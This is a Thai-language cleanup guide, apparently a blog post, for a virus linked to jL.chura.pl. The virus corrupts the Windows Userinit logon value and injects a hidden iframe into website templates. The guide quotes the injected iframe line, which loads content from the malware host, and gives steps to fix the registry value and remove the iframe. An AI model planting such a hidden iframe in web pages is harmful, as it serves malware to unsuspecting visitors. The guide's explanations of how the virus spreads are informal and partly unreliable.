วิธีค้นหาไวรัส jL.chura.pl ซึ่งเป็น javascript และ Userinit Logon Application
ไวรัสชนิดนี้จะแฝงมากับการดาวน์โหลดเกี่ยวกับเว็บไซต์ เช่น ไปดาวน์โหลด Template ของ Monster หรืออื่นๆมาเป็นต้น ซึ่งจะมีไวรัสติดมาด้วย อาการอย่างเบาก็แค่ถูกฝัง<iframe ซึ่งจะเป็นสะพานเชื่อมไปยังเว็บไซต์ที่เผยแพร่ไวรัส อย่างหนักจะทำให้ระบบคอมของเราสู่สภาวะ วินโดว์ไม่สามารถเข้า Logon ได้อาการที่ถูกฟ้องคือ Userinit Logon Application และเมื่อลบออกและฟอร์แมตใหม่มันก็จะกลับมาอีก สาเหตุที่มันกลับมาก็เพราะมันได้เข้าไปฝังตัวเพิ่มขึ้นในทุกๆครั้งที่เราเปิดโปรแกรมใดๆก็ตามขึ้นมาทำงาน ไวรัสมันจะเข้าไปทำลายระบบและฝังตัวในทุกๆโปรแกรมที่เราเปิดขึ้นมาโดยเราไม่รู้ตัว ดังนั้นเมื่อโดนไวรัสตัวนี้แล้วควรจะลบไฟล์ที่น่าสงสัยที่เราดาวน์โหลดมาทิ้งรวมทั้งไฟล์และโปรแกรมที่เราเข้าไปยุ่งเกี่ยวด้วยทั้งหมดทิ้งไปให้หมดโดยเฉพาะโปรแกรมสแกนไวรัสเมื่อเราโดนเรามักจะคลิกสแกนเสมอ จึงทำให้มันเข้าไปฝังตัวทั้งในระบบวินโดว์และไฟล์ต้นฉบับของเรา และเมื่อใดก็ตามที่เราเข้าไปคลิกหรือเปิดโปรแกรมนั้นๆอีกเจ้าไวรัสก็จะเข้าไปในระบบของ Userinit จึงทำให้เราเข้าสู่ระบบ Userinit Logon Application ทุกๆครั้งที่ปิดและเปิดเครื่อง และผลที่ตามมาอีกก็คือไฟล์ใดๆที่เป็น html หรือ php จะถูกมันลบทิ้งไปโดยอัตโนมัติ เพราะไวรัสชนิดนี้ระบบมันจะวิ่งไปหาไฟล์ประเภทเว็บไซต์แล้วฝังตัวเองลงไปใน template ของเว็บไซต์ในทุกๆ template ที่มีคำว่า </body> เสมอๆ และถ้าเราเปิดเทมเพลตใดเทมเพลตนั้นก็จะถูกติด <iframe ฝังจาวาสคริปต์ลงไปทันที และถ้าเราเปิดโฮสท์ติดต่อกับ Sever โดยทาง FTP ไวรัสดังกล่าวจะวิ่งเข้าไปฝังตัวในทุกๆ เทมเพลตโดยอัตโนมัติ และเมื่อผู้ชมเปิดเว็บไซต์นั้นๆขึ้นมา เจ้าลิงค์ <iframe นี้จะวิ่งไปที่ ไซต์ของ jL.chura.pl/rc/ ทำให้เราได้รับไวรัสจากเว็บนั้น <iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
</body>
</html>
แนวทางแก้ไข
กรณี Userinit Logon Application ให้ลบไฟล์ที่เป็นต้นเหตุทิ้งทั้งหมด รวมทั้งไฟล์ที่เราเข้าไปเกี่ยวข้องด้วยหลังจากที่เราโดนไวรัสไปแล้วให้ลบทิ้งทั้งหมด และทำดังนี้
เปิด start > run > พิมพ์ regedit คลิก run แล้วไปที่
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
ช่องทางขวามือให้มองหาคำว่า Userinit และดับเบิ้ลคลิกเปิดมัน จะมีป็อปอัพ Edit String แสดงขึ้มา ในช่อง Value data :
C:\WINDOWS\system32\userinit.exe,.... <<< ถ้ามีการใส่ค่าต่างๆต่อท้ายจากตรงนี้นั้นคือไวรัสได้เข้ามาเพิ่มมัน
ให้แก้เป็น Userinit C:\WINDOWS\system32\userinit.exe, และรีสตาร์ทเครื่องก็จะสามารถเข้าวินโดว์ได้ปกติ ไฟล์ซ่อม userinit.exe
กรณีเทมเพลตมีไวรัส ให้เปิดเทมเพลตของเว็บไซต์เช็คทุกๆเทมเพลต ด้วยโปรแกรมสร้างเว็บไซต์ ของคุณ กด Ctrl + F ค้นหาโดยใส่คำว่า <iframe คลิก next ค้นหา เมื่อเจอ <iframe เชื่อมโยงไวรัส jL.chura.pl ก็ลบออกเพียงเท่านี้ เว็บไซต์เราก็ปราศจากไวรัส
